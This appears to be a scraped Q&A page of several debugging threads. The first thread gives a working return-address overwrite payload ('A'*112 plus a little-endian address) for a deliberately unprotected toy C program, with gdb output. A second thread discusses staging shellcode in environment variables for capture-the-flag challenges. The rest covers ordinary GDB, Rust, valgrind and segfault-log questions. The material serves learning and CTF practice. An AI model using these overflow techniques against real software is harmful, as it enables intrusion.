How to generate payload with python for buffer overflow?

How to generate payload with python for buffer overflow? - python-2.7

I'm trying to provoke a buffer overflow in order to execute a function on C code. So far I already managed to find out what is the number of bytes to take over EBP register. The only thing next is to substitute the address of EIP to the function I wish to execute. I'm trying to generate this payload with python. For this I use the following
python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload
This is what I get
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;�
Notice those last characters! I know that it's not what I was suppose to get. The address I wish to run on EIP register is 0804863b. I had to put this on little endian for the exploit to run properly. Any comments on this?

If you run this payload:
python -c 'print "A"*112 + "B"*4' > attack_payload
And then if you have the control of the PC (EIP=42424242)
(gdb) r < attack_payload
You can replace the "BBBB" with your address 0804863b
python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload
It is all, you should verify before if you have the EIP control.
More info (I see the source code), in a simple way (for a better explanation) try to compile with the following command
gcc -o main main.c -fno-stack-protector -g -m32
Run it with the debugger (gdb ./main) and set the following breakpoint
gef➤ b 13
Breakpoint 2 at 0x8048611: file main.c, line 13.
Continue and insert the following payload
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC
Go on at the instruction
→ 0x804862d <stringLength+60> ret
And you can see that now you have the control of the ret value
gef➤ bt
#0 0x0804862d in stringLength () at main.c:14
#1 0x43434343 in ?? ()
#2 0x08048800 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
gef➤ x/x $sp
0xffffd5ec: 0x43434343
Now you can replace "CCCC" with the address of the win function
gef➤ p win
$1 = {void ()} 0x80485dd <win>
You can automatize all with a simple python script (try to see this library pwntools), you payload will be:
payload = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
payload += "\xdd\x85\x04\x08"
Or also you can run
python -c 'print "1"+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xdd\x85\x04\x08"' | ./main

Related

Differences in environment layout with and without GDB

Recently I have been working on CTF challenges that require the attacker to stage shellcode in the environment. With ASLR disabled, one can rely on only slight differences between the environment of the shell, for example, and that of the exploitable process (e.g. differences due only to binary name differences). However, GDB (and R2) will make slight changes to the environment that make this very hard to do due to the environment variables shifting around slightly when not being debugged.
For example, GDB seems to at least add the environment variables LINES and COLUMNS. However, these can be removed by invoking GDB as follows:
gdb -ex 'set exec-wrapper env -u LINES -u COLUMNS' -ex 'r < exploit.input' challenge.bin
Note that GDB will implicitly use the fully qualified path when debugging a binary, so the user can further decrease any differences by invoking the binary in a similar manner.
`pwd`/challenge.bin < exploit.input
However, there still appear to be some differences. I have many times been able to get an exploit working while in GDB, but only to have it crash when run without the debugger. I've read mention of some script (sometimes referred to as setenv.sh) that can (allegedly) be used to setup an environment exactly like GDB, but I have not been able to find it.
Looking at the env of the shell:
LANG=en_US.UTF-8
PROFILEHOME=
DISPLAY=:0
OLDPWD=/home/user
SHELL_SESSION_ID=e7a0e681012e480fb044a034a775bb83
INVOCATION_ID=8ef3be94d09f4e47a0322ddf0d6ed787
COLORTERM=truecolor
MOZ_PLUGIN_PATH=/usr/lib/mozilla/plugins
XDG_VTNR=1
XDG_SESSION_ID=c1
USER=user
PWD=/test
HOME=/home/user
JOURNAL_STREAM=9:15350
KONSOLE_DBUS_SESSION=/Sessions/1
KONSOLE_DBUS_WINDOW=/Windows/1
GTK_MODULES=canberra-gtk-module
MAIL=/var/spool/mail/user
WINDOWPATH=1
TERM=xterm-256color
SHELL=/bin/bash
KONSOLE_DBUS_SERVICE=:1.7
KONSOLE_PROFILE_NAME=Profile 1
SHELLCODE=����
XDG_SEAT=seat0
SHLVL=4
COLORFGBG=15;0
LANGUAGE=
WINDOWID=16777222
LOGNAME=user
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
XDG_RUNTIME_DIR=/run/user/1000
XAUTHORITY=/home/user/.Xauthority
PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl
_=/usr/bin/env
And comparing it to that of GDG (LINES and COLUMNS removed):
/test/challenge.bin
_=/usr/bin/gdb
LANG=en_US.UTF-8
DISPLAY=:0
PROFILEHOME=
OLDPWD=/home/user
SHELL_SESSION_ID=e7a0e681012e480fb044a034a775bb83
INVOCATION_ID=8ef3be94d09f4e47a0322ddf0d6ed787
COLORTERM=truecolor
MOZ_PLUGIN_PATH=/usr/lib/mozilla/plugins
XDG_VTNR=1
XDG_SESSION_ID=c1
USER=user
PWD=/test
HOME=/home/user
JOURNAL_STREAM=9:15350
KONSOLE_DBUS_SESSION=/Sessions/1
KONSOLE_DBUS_WINDOW=/Windows/1
GTK_MODULES=canberra-gtk-module
MAIL=/var/spool/mail/user
WINDOWPATH=1
SHELL=/bin/bash
TERM=xterm-256color
KONSOLE_DBUS_SERVICE=:1.7
KONSOLE_PROFILE_NAME=Profile 1
SHELLCODE=����
COLORFGBG=15;0
SHLVL=4
XDG_SEAT=seat0
LANGUAGE=
WINDOWID=16777222
LOGNAME=user
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
XDG_RUNTIME_DIR=/run/user/1000
XAUTHORITY=/home/user/.Xauthority
PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl
/test/challenge.bin
One can see the environments are not very different on inspection. Notably, the GDB env seems to have a second instance of the debugged binary's name (e.g. challenge.bin, in this case), as well as the fact that it sets _ to GDB rather than the debugged binary. The offsets seem to be way off, even when taking these small changes into account.
TL;DR
How can the GDB environment differences be nulled out for the case when it is necessary to know a priori the locations of things in the environment with and without the debugger running?
In an effort of lazyness, has anyone fully characterized the with/without GDB environment, or the changes GDB makes?
And for those interested, R2 appears to made changes to PATH. There may also be other differences.

How can the GDB environment differences be nulled out
One way is to run the binary outside of GDB (have the binary wait for GDB to attach, as described here), and attach GDB to it from "outside".
Update:
the binary in question is part of a challenge and source is not provided
You can patch _start with a jmp _start (so the binary will never progress past the first instruction). Once attached, replace the jmp with the original instruction, and start debugging.
Update 2:
Are you familiar with a better process?
In order to find offset of a given function in the ELF file, you need two values: offset of the function within section, and offset of section within the file.
For example:
$ readelf -Ws a.out | grep ' _start'
58: 00000000004003b0 43 FUNC GLOBAL DEFAULT 11 _start
This tells you that _start is linked at 0x4003b0 in section 11.
What is that section, what is its starting address, and where in the file does it start?
$ readelf -WS a.out | grep '\[11\]'
[11] .text PROGBITS 00000000004003b0 0003b0 000151 00 AX 0 0 16
We now see that _start is at the very start of .text (this is usually the case), and that .text starts at offset 0x3b0 in the file. QED.
An even better process is to use GDB to perfom the patching (GDB will perform all the finding of offsets). Suppose I want to overwrite the first instruction of _start with 0xCC instruction:
$ gdb --write -q ./a.out
Reading symbols from ./a.out...done.
Let's look at the original instructions first:
(gdb) x/4i _start
0x4003b0 <_start>: xor %ebp,%ebp
0x4003b2 <_start+2>: mov %rdx,%r9
0x4003b5 <_start+5>: pop %rsi
0x4003b6 <_start+6>: mov %rsp,%rdx
Now let's patch the first one:
(gdb) set *(char*)0x4003b0 = 0xCC
(gdb) x/4i _start
0x4003b0 <_start>: int3
0x4003b1 <_start+1>: in (%dx),%eax
0x4003b2 <_start+2>: mov %rdx,%r9
0x4003b5 <_start+5>: pop %rsi
(gdb) quit
Segmentation fault (core dumped) <<-- this is a GDB bug. I should fix it some day.
$ objdump -d a.out
...
Disassembly of section .text:
00000000004003b0 <_start>:
4003b0: cc int3 <<-- success!
4003b1: ed in (%dx),%eax
4003b2: 49 89 d1 mov %rdx,%r9
...
Voila!

Unable to set a breakpoint on main while debugging a program compiled with Rust 1.10 with GDB

I'm trying to step through this:
fn main() {
println!("Hello {}", 0);
}
I've tried compiling with both: cargo build and rustc -g -L src/main.rs
I then run gdb target/debug/rust-gdb-test (or gdb main), and try to set a breakpoint on main with break main.
(break ::rust-gdb-test::main returns Function "::rust-gdb-test" not defined.).
After breaking (Breakpoint 1, 0x0000555555559610 in main ()) if I try to run list, I get:
1 dl-debug.c: No such file or directory.
I am running Rust 1.10.0 (cfcb716cf 2016-07-03) and GDB 7.7.1 (Debian 7.7.1+dfsg-5).
A similar question was asked 2 years ago, but I couldn't make the solutions presented there to work.

Note: I seem to not have GDB installed anymore, only LLDB, but for this question the answer is the same.
The main that you see in Rust is not the same main that exists in the compiled binary. Specifically, there are a number of shim methods between the two. The Rust main actually includes the crate name (in my example buggin) and a hash (in my case hfe08615ed561bb88):
* frame #0: 0x000000010000126d buggin`buggin::main::hfe08615ed561bb88 + 29 at main.rs:2
frame #1: 0x000000010000810e buggin`std::panicking::try::call::hbbf4746cba890ca7 + 30
frame #2: 0x000000010000aadc buggin`__rust_try + 12
frame #3: 0x000000010000aa76 buggin`__rust_maybe_catch_panic + 38
frame #4: 0x0000000100007f32 buggin`std::rt::lang_start::hbcefdc316c2fbd45 + 562
frame #5: 0x00000001000013aa buggin`main + 42
frame #6: 0x00007fff910435ad libdyld.dylib`start + 1
frame #7: 0x00007fff910435ad libdyld.dylib`start + 1
Here, you can see that main is a few frames away in the stack.
I tend to use a wildcard breakpoint to not deal with the hash:
(lldb) br set -r 'buggin::main.*'
Breakpoint 5: where = buggin`buggin::main::hfe08615ed561bb88 + 29, address = 0x000000010000126d
rbreak should be an equivalent in GDB.
Once the program is stopped, you should be able to see the source. You may also be interested in the rust-lldb and rust-gdb wrappers that ship with Rust and improve the experience a bit.
This is basically the same as this answer, but mentions the hash.
Neither (gdb) rbreak 'rust-gdb-test::main.*' nor (lldb) br set -r 'rust-gdb-test::main.*' set any breakpoints for me.
The hyphen (-) is not a valid symbol character. When compiled, it is converted to an underscore.
My original methodology was actually this:
(lldb) br set -r '.*main.*'
Breakpoint 2: 67 locations.
You can then run the program and continue a few times until you find the right place. Don't be afraid to get in there and explore a bit; it's just a debugger!
You could try various versions of the regex to see if anything interesting might match:
(lldb) br set -r '.*main::.*'
Breakpoint 3: where = rust-gdb-test`rust_gdb_test::main::h97d2ac6fea75a245 + 29,
(lldb) br set -r '.*::main.*'
Breakpoint 4: where = rust-gdb-test`rust_gdb_test::main::h97d2ac6fea75a245 + 29,
You could also call a function with a very unique name from main and set a breakpoint on that:
(lldb) br set -r '.*a_really_unique_name.*'

GDB not seeing correct function argument values even though they are set

First time trying to debug on a quad-core Xeon after 15 years of successful x86 GDB use.
Linux DellT3500 3.16.0-23-generic #31-Ubuntu SMP Tue Oct 21 17:56:17 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
g++ compiler flags:
-Wall -Wwrite-strings -Wchar-subscripts -Wparentheses -gstabs+ -DLINUX -O0
Setting a breakpoint in a certain class member function shows this=0x0 and the other parameter incorrectly when the breakpoint happens. But inserting a printf in the code right after that shows that this and the parameter are actually set correctly:
Breakpoint 1, PlayGamePage::actionPerformed (this=0x0, inTarget=0x7fffffffdf90)
at PlayGamePage.cpp:725
725 printf( "hey, this = %x, inTarget = %x\n", this );
(gdb) next
hey, this = b6cc50, inTarget = b6ce18
727 if( inTarget == &mCommitButton &&
(gdb) print this
$1 = (PlayGamePage * const) 0x0
(gdb) print inTarget
$2 = (GUIComponent *) 0x7fffffffdf90
(gdb)
But you can see how GDB can't even print these values correctly, even though they are set and printable by the code with printf. This is is a big problem, because GDB has no access to printing member variables.
Also, the rest of the function body uses this extensively and inTarget extensively (accessing class members and testing inTarget), and the code functions as expected. No crashes or misbehavior, so this is set correctly in the code, but GDB can't see it.
Going up the stack:
(gdb) up
#1 0x000000000040a11f in ActionListenerList::fireActionPerformed (
this=0xb6cf98, inTarget=0xb6cf48)
at ../../minorGems/ui/event/ActionListenerList.h:134
134 listener->actionPerformed( inTarget );
See that inTarget matches what printf sees down in the actionPerformed function body. Also, gdb can print these values fine at this point:
(gdb) print inTarget
$5 = (GUIComponent *) 0xb6cf48
(gdb) print listener
$6 = (ActionListener *) 0xb6ce18
listener should match this down in the function body, and it does according to printf, but gdb sees this=0x0 instead.
Yes, this is a virtual function that is being called (PlayGamePage implements the ActionListener interface, overriding the actionPerformed virtual function).
I just placed a breakpoint in exactly the same code in GDB on 32-bit x86, and it sees both this and inTarget correctly and can print them correctly, with values matching what the code's printf shows.

This is either a bug in your GCC (which version are you using?) or a bug in GDB.
Since you are apparently running an old CVS snapshot of GDB, I suggest first trying a stable GDB release instead.

How can I use a variable name instead of addresses when debugging valgrind runs with gdb?

Let's say I'm debugging with valgrind and gdb by doing:
$ valgrind --vgdb-error=0 ./magic
...and then in a second terminal:
$ gdb ./magic
...
(gdb) target remote | /usr/lib/valgrind/../../bin/vgdb
If I want to examine the defined-ness of some memory, I can use:
(gdb) p &batman
$1 = (float *) 0xffeffe20c
(gdb) p sizeof(batman)
$2 = 4
(gdb) monitor get_vbits 0xffeffe20c 4
ffffffff
Using three commands to do one thing is kind of annoying, especially since I usually want to do this a few times for many different variables in the same stack frame. But if I try the obvious thing, I get:
(gdb) monitor get_vbits &batman sizeof(batman)
missing or malformed address
Is it possible to get gdb to evaluate &batman and sizeof(batman) on the same line as my monitor command?

But if I try the obvious thing, I get: missing or malformed address
This is from GDB doc (http://sourceware.org/gdb/onlinedocs/gdb/Connecting.html#index-monitor-1210) for the monitor cmd:
monitor cmd
This command allows you to send arbitrary commands
directly to the remote monitor. Since gdb doesn't care about the
commands it sends like this, this command is the way to extend gdb—you
can add new commands that only the external monitor will understand
and implement.
As you can see "gdb doesn't care about the commands it sends like this". It probably means that the command after monitor is not processed in any way and sent AS IS.
What you can do to evaluate your variable on the same line is to use user defined commands in gdb (http://sourceware.org/gdb/onlinedocs/gdb/Define.html). Define your own comand and use the eval gdb command to prepare your command with necessary values (http://sourceware.org/gdb/current/onlinedocs/gdb/Output.html#index-eval-1744):
define monitor_var
eval "monitor get_vbits %p %d", &$arg0, sizeof($arg0)
end
And then use it like this:
(gdb) monitor_var batman

How do you read a segfault kernel log message

This can be a very simple question, I'm am attempting to debug an application which generates the following segfault error in the kern.log
kernel: myapp[15514]: segfault at 794ef0 ip 080513b sp 794ef0 error 6 in myapp[8048000+24000]
Here are my questions:
Is there any documentation as to what are the diff error numbers on segfault, in this instance it is error 6, but i've seen error 4, 5
What is the meaning of the information at bf794ef0 ip 0805130b sp bf794ef0 and myapp[8048000+24000]?
So far i was able to compile with symbols, and when i do a x 0x8048000+24000 it returns a symbol, is that the correct way of doing it? My assumptions thus far are the following:
sp = stack pointer?
ip = instruction pointer
at = ????
myapp[8048000+24000] = address of symbol?

When the report points to a program, not a shared library
Run addr2line -e myapp 080513b (and repeat for the other instruction pointer values given) to see where the error is happening. Better, get a debug-instrumented build, and reproduce the problem under a debugger such as gdb.
If it's a shared library
In the libfoo.so[NNNNNN+YYYY] part, the NNNNNN is where the library was loaded. Subtract this from the instruction pointer (ip) and you'll get the offset into the .so of the offending instruction. Then you can use objdump -DCgl libfoo.so and search for the instruction at that offset. You should easily be able to figure out which function it is from the asm labels. If the .so doesn't have optimizations you can also try using addr2line -e libfoo.so <offset>.
What the error means
Here's the breakdown of the fields:
address - the location in memory the code is trying to access (it's likely that 10 and 11 are offsets from a pointer we expect to be set to a valid value but which is instead pointing to 0)
ip - instruction pointer, ie. where the code which is trying to do this lives
sp - stack pointer
error - Architecture-specific flags; see arch/*/mm/fault.c for your platform.

Based on my limited knowledge, your assumptions are correct.
sp = stack pointer
ip = instruction pointer
myapp[8048000+24000] = address
If I were debugging the problem I would modify the code to produce a core dump or log a stack backtrace on the crash. You might also run the program under (or attach) GDB.
The error code is just the architectural error code for page faults and seems to be architecture specific. They are often documented in arch/*/mm/fault.c in the kernel source. My copy of Linux/arch/i386/mm/fault.c has the following definition for error_code:
bit 0 == 0 means no page found, 1 means protection fault
bit 1 == 0 means read, 1 means write
bit 2 == 0 means kernel, 1 means user-mode
My copy of Linux/arch/x86_64/mm/fault.c adds the following:
bit 3 == 1 means fault was an instruction fetch

If it's a shared library
You're hosed, unfortunately; it's not possible to know where the
libraries were placed in memory by the dynamic linker after-the-fact.
Well, there is still a possibility to retrieve the information, not from the binary, but from the object. But you need the base address of the object. And this information still is within the coredump, in the link_map structure.
So first you want to import the struct link_map into GDB. So lets compile a program with it with debug symbol and add it to the GDB.
link.c
#include <link.h>
toto(){struct link_map * s = 0x400;}
get_baseaddr_from_coredump.sh
#!/bin/bash
BINARY=$(which myapplication)
IsBinPIE ()
{
readelf -h $1|grep 'Type' |grep "EXEC">/dev/null || return 0
return 1
}
Hex2Decimal ()
{
export number="`echo "$1" | sed -e 's:^0[xX]::' | tr '[a-f]' '[A-F]'`"
export number=`echo "ibase=16; $number" | bc`
}
GetBinaryLength ()
{
if [ $# != 1 ]; then
echo "Error, no argument provided"
fi
IsBinPIE $1 || (echo "ET_EXEC file, need a base_address"; exit 0)
export totalsize=0
# Get PT_LOAD's size segment out of Program Header Table (ELF format)
export sizes="$(readelf -l $1 |grep LOAD |awk '{print $6}'|tr '\n' ' ')"
for size in $sizes
do Hex2Decimal "$size"; export totalsize=$(expr $number + $totalsize); export totalsize=$(expr $number + $totalsize)
done
return $totalsize
}
if [ $# = 1 ]; then
echo "Using binary $1"
IsBinPIE $1 && (echo "NOT ET_EXEC, need a base_address..."; exit 0)
BINARY=$1
fi
gcc -g3 -fPIC -shared link.c -o link.so
GOTADDR=$(readelf -S $BINARY|grep -E '\.got.plt[ \t]'|awk '{print $4}')
echo "First do the following command :"
echo file $BINARY
echo add-symbol-file ./link.so 0x0
read
echo "Now copy/paste the following into your gdb session with attached coredump"
cat <<EOF
set \$linkmapaddr = *(0x$GOTADDR + 4)
set \$mylinkmap = (struct link_map *) \$linkmapaddr
while (\$mylinkmap != 0)
if (\$mylinkmap->l_addr)
printf "add-symbol-file .%s %#.08x\n", \$mylinkmap->l_name, \$mylinkmap->l_addr
end
set \$mylinkmap = \$mylinkmap->l_next
end
it will print you the whole link_map content, within a set of GDB command.
It itself it might seems unnesseray but with the base_addr of the shared object we are about, you might get some more information out of an address by debuging directly the involved shared object in another GDB instance.
Keep the first gdb to have an idee of the symbol.
NOTE : the script is rather incomplete i suspect you may add to the second parameter of add-symbol-file printed the sum with this value :
readelf -S $SO_PATH|grep -E '\.text[ \t]'|awk '{print $5}'
where $SO_PATH is the first argument of the add-symbol-file
Hope it helps

We Keep Coding

c++ django amazon-web-services regex python-2.7 google-cloud-platform list unit-testing opengl ember.js